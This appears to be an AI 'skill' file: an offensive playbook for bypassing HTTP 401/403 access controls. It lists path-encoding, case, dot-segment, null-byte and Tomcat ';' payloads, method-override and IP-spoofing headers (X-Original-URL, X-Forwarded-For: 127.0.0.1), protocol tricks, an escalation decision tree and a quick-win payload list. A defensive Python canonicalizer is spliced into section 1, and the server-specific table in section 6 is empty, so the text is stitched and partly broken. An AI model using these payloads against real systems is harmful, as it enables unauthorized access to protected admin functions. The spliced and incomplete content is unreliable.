401-403-bypass-techniques
SKILL: 401/403 Bypass Techniques — Expert Attack Playbook
AI LOAD INSTRUCTION: Comprehensive 401/403 forbidden bypass techniques. Covers path normalization tricks, HTTP method override, header-based bypasses (X-Original-URL, X-Forwarded-For), protocol version tricks, and combination attacks. Base models typically know 2-3 header bypasses but miss the full matrix of path manipulation variants and verb+path combos.
0. RELATED ROUTING
- authbypass-authentication-flaws — broader auth bypass (login flaws, session handling)
- waf-bypass-techniques — when bypass is WAF-specific rather than access control
- http-host-header-attacks — Host header manipulation for routing bypass
- request-smuggling — smuggle past access controls entirely
- http2-specific-attacks — h2c smuggling to bypass proxy ACLs
1. PATH MANIPULATION BYPASSES
The core idea: the reverse proxy/WAF checks one path format, but the backend normalizes differently.
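To make that mismatch concrete from the defender's side, here is an added example (not part of the playbook) of a proxy-side canonicalizer that applies the normalizations the subsections below exploit before the ACL decision is made, so the proxy and the backend agree on one form. `canonicalize`, `acl_denies`, the Tomcat-style `;` handling and the `case_insensitive` switch are assumptions about the backend, not taken from the page.

```python
# Added illustration: canonicalize the request target the way a lenient backend would,
# then fail closed on anything that cannot be normalized safely.
import re
from urllib.parse import unquote

# C0/C1 lead bytes never occur in valid UTF-8: explicit check for overlong forms (1.5).
_OVERLONG = re.compile(r"%c[01]%[0-9a-f]{2}", re.IGNORECASE)

def canonicalize(raw_target, case_insensitive=False):
    """Return the canonical path, or None when the request must be rejected outright."""
    path = raw_target.split("?", 1)[0].split("#", 1)[0]   # drop query/fragment (1.9 '/admin?')
    if _OVERLONG.search(path):
        return None                                        # overlong UTF-8 (1.5)
    try:
        decoded = unquote(path, errors="strict")           # exactly one decode pass (1.3)
    except UnicodeDecodeError:
        return None                                        # not valid UTF-8 after decoding
    if "%" in decoded and unquote(decoded) != decoded:
        return None                                        # double encoding (1.4): reject, don't guess
    if "\x00" in decoded:
        return None                                        # null byte (1.7)
    decoded = decoded.replace("\\", "/")                   # IIS treats backslash as slash (1.10)
    stack = []
    for seg in decoded.split("/"):
        seg = seg.split(";", 1)[0].strip(" \t")            # ;param (1.8), %20/%09 padding (1.9)
        if seg in ("", "."):
            continue                                       # '//', '/./', trailing slash (1.1, 1.6, 1.11)
        if seg == "..":
            if not stack:
                return None                                # escape above root ('\..\admin')
            stack.pop()
            continue
        stack.append(seg.lower() if case_insensitive else seg)   # case folding (1.2)
    return "/" + "/".join(stack)

def acl_denies(raw_target, protected="/admin", case_insensitive=False):
    """Deny the protected path, anything below it, and suffix-routed forms like /admin.json."""
    canon = canonicalize(raw_target, case_insensitive)
    if canon is None:
        return True                                        # unnormalizable request: fail closed
    p = protected.lower() if case_insensitive else protected
    return canon == p or canon.startswith(p + "/") or canon.startswith(p + ".")

if __name__ == "__main__":
    for probe in ("/admin/", "/%2561dmin", "/admin..;/", "/Admin"):
        print(probe, "->", canonicalize(probe), "deny" if acl_denies(probe) else "allow")
```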
1.1 Trailing Slash / Missing Slash
```
/admin → 403
/admin/ → 200 ✓ (trailing slash)
/admin/. → 200 ✓ (trailing dot)
```
1.2 Case Sensitivity
```
/admin → 403
/Admin → 200 ✓
/ADMIN → 200 ✓
/aDmIn → 200 ✓
```
Works when: the proxy rule is case-sensitive but the backend is case-insensitive (common on Windows/IIS).
1.3 URL Encoding
```
/admin → 403
/%61dmin → 200 ✓ (encode 'a')
/admi%6e → 200 ✓ (encode 'n')
/%61%64%6d%69%6e → 200 ✓ (full encode)
```
1.4 Double URL Encoding
```
/admin → 403
/%2561dmin → 200 ✓ (%25 = %, decoded twice: %61 → a)
/admin%252f → 200 ✓
/admin..%252f → 200 ✓
```
1.5 Unicode / UTF-8 Encoding
```
/admin → 403
/admi%C0%AE → 200 ✓ (overlong UTF-8 for '.')
/admi%C0%6E → 200 ✓ (overlong encoding)
/%C0%AFadmin → 200 ✓ (overlong '/')
```
1.6 Dot-Segment / Path Traversal
```
/admin → 403
/./admin → 200 ✓
//admin → 200 ✓
/admin/./ → 200 ✓
/.//admin → 200 ✓
/admin..;/ → 200 ✓ (Tomcat path parameter)
```
1.7 Null Byte
```
/admin → 403
/admin%00 → 200 ✓
/admin%00.json → 200 ✓
/%00/admin → 200 ✓
```
1.8 Path Parameter Injection
```
/admin → 403
/admin;foo=bar → 200 ✓ (Tomcat/Java treats ; as path param)
/admin; → 200 ✓
/admin;x → 200 ✓
```
1.9 Trailing Special Characters
```
/admin%20 (space)
/admin%09 (tab)
/admin? (empty query)
/admin.json
/admin.html
/admin/~
```
1.10 Backslash (Windows/IIS)
```
/admin\
/admin\..\/
\..\admin
```
1.11 Combined Path Tricks
```
///admin///
/./admin/./
/admin/..;/admin (Tomcat)
/%2e/admin
```
2. HTTP METHOD BYPASS
2.1 Direct Method Change
```
GET /admin → 403
POST /admin → 200 ✓
PUT /admin → 200 ✓
PATCH /admin → 200 ✓
DELETE /admin → 200 ✓
OPTIONS /admin → 200 ✓ (may leak allowed methods)
TRACE /admin → 200 ✓ (may reflect headers — XST)
HEAD /admin → 200 ✓ (same as GET but no body — confirms access)
```
2.2 Method Override Headers
When the proxy blocks by method but the backend reads override headers:
```http
GET /admin HTTP/1.1
X-HTTP-Method-Override: PUT

GET /admin HTTP/1.1
X-Method-Override: POST

GET /admin HTTP/1.1
X-HTTP-Method: DELETE

POST /admin HTTP/1.1
X-HTTP-Method-Override: PATCH

_method=PUT   (in POST body — Rails, Laravel)
```
2.3 Custom / Invalid Methods
```
FOOBAR /admin HTTP/1.1   → some ACLs only check GET/POST
GETS /admin HTTP/1.1     → typo-like methods may bypass
CONNECT /admin HTTP/1.1  → proxy may tunnel
PROPFIND /admin HTTP/1.1 → WebDAV method
MOVE /admin HTTP/1.1     → WebDAV method
```
3. HEADER-BASED BYPASS
3.1 URL Rewrite Headers (Nginx/IIS)
These headers tell the backend the "real" URL, bypassing proxy-level path checks:
```http
GET / HTTP/1.1
X-Original-URL: /admin

GET / HTTP/1.1
X-Rewrite-URL: /admin
```
The proxy sees `GET /` (allowed), but the backend routes to `/admin`.
3.2 IP Spoofing Headers (Whitelist Bypass)
Headers to try (each with the values `127.0.0.1`, `10.0.0.1`, `0.0.0.0`, `::1`):
```http
X-Forwarded-For | X-Real-IP | X-Originating-IP | X-Remote-IP
X-Remote-Addr | X-Client-IP | True-Client-IP | Cluster-Client-IP
X-ProxyUser-IP | X-Custom-IP-Authorization | Forwarded: for=127.0.0.1
```
IP encoding variants: `0177.0.0.1` (octal), `2130706433` (decimal), `0x7f000001` (hex), `localhost`.
3.3 Other Header Tricks
```http
Referer: https://target.com/admin   # Referrer check bypass
Origin: https://target.com          # Origin check bypass
Host: localhost                     # Host header manipulation
X-Forwarded-Host: localhost         # Forwarded host
Content-Type: application/json      # Content-type switch
X-Requested-With: XMLHttpRequest    # AJAX flag
```
4. PROTOCOL VERSION BYPASS
```http
# HTTP/1.0 (some ACLs only apply to HTTP/1.1)
GET /admin HTTP/1.0

# HTTP/0.9 (extremely legacy — no headers)
GET /admin

# HTTP/2 pseudo-header tricks
:method: GET
:path: /admin
:authority: target.com
```
See ../http2-specific-attacks/SKILL.md for H2-specific bypasses.
---
5. VERB TAMPERING + PATH COMBINATION
Combine multiple techniques for a higher success rate:
```http
POST / HTTP/1.1            # method override + URL rewrite
X-Original-URL: /admin
X-HTTP-Method-Override: GET

GET /%61dmin HTTP/1.1      # IP spoof + path encoding
X-Forwarded-For: 127.0.0.1

GET /Admin HTTP/1.0        # protocol + case + IP spoof
X-Forwarded-For: 127.0.0.1
```
6. TECHNOLOGY-SPECIFIC BYPASSES
| Server | Key Tricks |
|---|---|
| Apache | |
| Nginx | |
| IIS/ASP.NET | |
| Tomcat/Java | |
| Spring | |
7. AUTOMATED TOOLS
| Tool | Purpose | URL |
|---|---|---|
| byp4xx | Comprehensive 403 bypass scanner | github.com/lobuhi/byp4xx |
| 403bypasser | Automated header/path/method bypass | github.com/sting8k/403bypasser |
| dirsearch | Directory brute-force with encoding variants | github.com/maurosoria/dirsearch |
| feroxbuster | Recursive content discovery | github.com/epi052/feroxbuster |
| Burp Intruder | Custom payload lists for manual testing | portswigger.net |
byp4xx usage
```bash
# Basic usage
./byp4xx.sh https://target.com/admin

# Output shows all attempted bypasses and their response codes
# 200/301/302 responses = potential bypass found
```
---
8. DECISION TREE
```
Got 401 or 403 on a path?
│
├── Try PATH MANIPULATION first (highest success rate)
│   ├── /path/ (trailing slash)
│   ├── /PATH (case change)
│   ├── /path%20 (trailing space)
│   ├── /./path (dot segment)
│   ├── //path (double slash)
│   ├── /path;x (path parameter — Java/Tomcat)
│   ├── /path..;/ (Tomcat specific)
│   ├── /%2e/path (encoded dot)
│   ├── /path%00 (null byte)
│   ├── /path%23 (encoded hash)
│   └── Result? → 200 = bypass found
│
├── Path tricks failed → Try METHOD BYPASS
│   ├── POST/PUT/PATCH/DELETE/OPTIONS
│   ├── HEAD (same as GET without body)
│   ├── X-HTTP-Method-Override: PUT
│   └── TRACE (may reflect auth headers — XST)
│
├── Method tricks failed → Try HEADER BYPASS
│   ├── X-Original-URL: /path (Nginx/IIS rewrite)
│   ├── X-Rewrite-URL: /path (same concept)
│   ├── X-Forwarded-For: 127.0.0.1 (IP whitelist)
│   ├── X-Real-IP: 127.0.0.1
│   ├── True-Client-IP: 127.0.0.1
│   └── Referer: https://target.com/path
│
├── Header tricks failed → Try PROTOCOL BYPASS
│   ├── HTTP/1.0 instead of 1.1
│   ├── HTTP/2 h2c smuggling (../http2-specific-attacks/)
│   └── WebSocket upgrade
│
├── Single techniques failed → Try COMBINATIONS
│   ├── Method + Path: POST /PATH/
│   ├── Header + Path: X-Forwarded-For + /path%20
│   ├── All three: POST + X-Original-URL + IP headers
│   └── Protocol + Path: HTTP/1.0 + encoded path
│
├── All bypasses failed → Consider ALTERNATIVE APPROACHES
│   ├── Request smuggling (../request-smuggling/) → smuggle past ACL
│   ├── SSRF (../ssrf-server-side-request-forgery/) → access from server
│   ├── IDOR (../idor-broken-object-authorization/) → access data directly
│   └── Auth flaws (../authbypass-authentication-flaws/) → login bypass
│
└── Automated scan with byp4xx / 403bypasser for completeness
```
9. QUICK REFERENCE — KEY PAYLOADS
```http
# Top 10 quick-wins (try these first)
GET /admin/ HTTP/1.1         # trailing slash
GET /Admin HTTP/1.1          # case change
GET /admin%20 HTTP/1.1       # trailing space
GET /./admin HTTP/1.1        # dot segment
GET //admin HTTP/1.1         # double slash
POST /admin HTTP/1.1         # method change
GET / HTTP/1.1               # X-Original-URL bypass
X-Original-URL: /admin
GET /admin HTTP/1.1          # IP whitelist bypass
X-Forwarded-For: 127.0.0.1
GET /admin;.css HTTP/1.1     # IIS path param
GET /admin..;/ HTTP/1.1      # Tomcat bypass
```